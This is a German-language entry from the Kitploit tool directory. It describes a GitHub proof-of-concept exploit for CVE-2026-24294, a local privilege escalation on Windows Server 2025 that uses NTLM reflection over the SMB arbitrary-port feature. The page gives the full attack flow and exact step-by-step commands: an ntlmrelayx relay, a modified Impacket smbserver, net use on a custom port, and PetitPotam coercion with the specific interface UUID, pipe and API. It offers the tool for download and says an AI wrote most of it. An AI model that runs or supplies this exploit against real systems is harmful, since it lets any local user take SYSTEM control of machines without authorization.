Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24294 — Lokale Privilegieneskalation PoC für CVE-2026-24294, die SMB-Arbitrary-Port und NTLM-Reflection missbraucht, um SYSTEM auf Windows Server 2025 zu erlangen. | Kitploit
Tools/GitHubGitHub/0xndi/cve-2026-24294
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

Lokale Privilegieneskalation PoC für CVE-2026-24294, die SMB-Arbitrary-Port und NTLM-Reflection missbraucht, um SYSTEM auf Windows Server 2025 zu erlangen.

Repository anzeigen
536vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24294 - Lokale NTLM-Reflection-LPE über SMB-Beliebigen-Port

Lokale Privilegienerweiterung auf Windows Server 2025 über NTLM-Reflection, die die in Windows 11 24H2 / Server 2025 eingeführte SMB-Funktion für beliebige Ports ausnutzt.

Schwachstelle

Windows 11 24H2 / Server 2025 führte eine SMB-Client-Funktion ein, die Verbindungen über beliebige TCP-Ports ermöglicht (net use \\host\share /tcpport:PORT). In Kombination mit SMB-Session-Multiplexing (MS-SMB2 Abschnitt 3.2.4.2) ermöglicht dies lokale NTLM-Reflection – ein Benutzer mit niedrigen Rechten kann einen privilegierten Dienst (LSASS) dazu zwingen, sich bei einem vom Angreifer kontrollierten SMB-Server auf einem nicht standardmäßigen Port zu authentifizieren und die erfasste NTLM-Authentifizierung anschließend an den echten SMB-Dienst auf Port 445 weiterzuleiten.

Auswirkung: NT AUTHORITY\SYSTEM von jedem lokalen Benutzer.

Betroffen: Windows Server 2025 (Standardkonfiguration). Windows 11 24H2 erzwingt SMB-Signierung und blockiert die Weiterleitung.

Angriffsablauf

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► SMB-Client ──TCP:12345──► smbserver.py (unsere)
                                                   │
                                                   ▼ NTLM-Blob weiterleiten
 SMB-Dienst (:445) ◄────────────────── ntlmrelayx.py
 ← SYSTEM-Sitzung
  1. net use öffnet eine TCP-Verbindung zu unserem SMB-Server auf einem benutzerdefinierten Port
  2. PetitPotam zwingt LSASS, sich bei \\127.0.0.1\share zu authentifizieren
  3. Der SMB-Client nutzt die bestehende TCP-Verbindung wieder (Session-Multiplexing)
  4. Unser smbserver erfasst den privilegierten NTLM-Blob und leitet ihn über ntlmrelayx weiter
  5. ntlmrelayx authentifiziert sich als SYSTEM beim echten SMB-Dienst auf Port 445

Voraussetzungen

  • Windows Server 2025 als Ziel
  • Python 3 mit Impacket
  • PetitPotam.exe (aus dem Quellcode mit Visual Studio erstellen, siehe PetitPotam/)

Verwendung

3 Terminals öffnen.

Terminal 1 – ntlmrelayx starten (lauscht auf RAW-Port 6666, leitet an lokales SMB weiter):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Terminal 2 – Modifizierten smbserver starten (lauscht auf Port 12345, leitet NTLM an Port 6666 weiter):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Terminal 3 – Den Exploit ausführen:

root@kitploit:~
:: Freigabe auf benutzerdefiniertem Port einhängen (öffnet persistente TCP-Verbindung)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: LSASS zwingen, sich bei unserem SMB-Server zu authentifizieren
PetitPotam.exe 127.0.0.1 localhost 2

Die whoami-Ausgabe von ntlmrelayx zeigt NT AUTHORITY\SYSTEM.

Komponenten

  • PetitPotam/ – Modifizierter PetitPotam-Quellcode. Zwei Änderungen gegenüber dem Original:
    • UUID: df1941c5-fe89-4e79-bf10-463657acf44d (WS2025-EFSRPC-Schnittstelle)
    • Named Pipe: \pipe\efsrpc
    • Verwendet API #2 (EfsRpcEncryptFileSrv), Freigabename fest auf test gesetzt
  • smbserver.py – Modifizierter Impacket-smbserver mit -relay-port-Flag. Hookt SMB2-SESSION_SETUP, um eine zweite NTLM-Authentifizierung auf einer gemultiplexten Verbindung zu erfassen und an einen RAW-Relay-Server (ntlmrelayx --raw-port) weiterzuleiten.

Danksagungen

Dieser PoC wurde größtenteils von KI (GLM 5.1) auf Grundlage der in den folgenden Quellen beschriebenen Forschung und Techniken geschrieben:

  • Bypassing Windows Authentication Reflection Mitigations for System Shells – Guillaume André, Synacktiv

Referenzen

  • CVE-2026-24294 – Microsoft Security Response Center
  • PetitPotam – Gilles Lionel
  • Impacket – Fortra
Tool herunterladen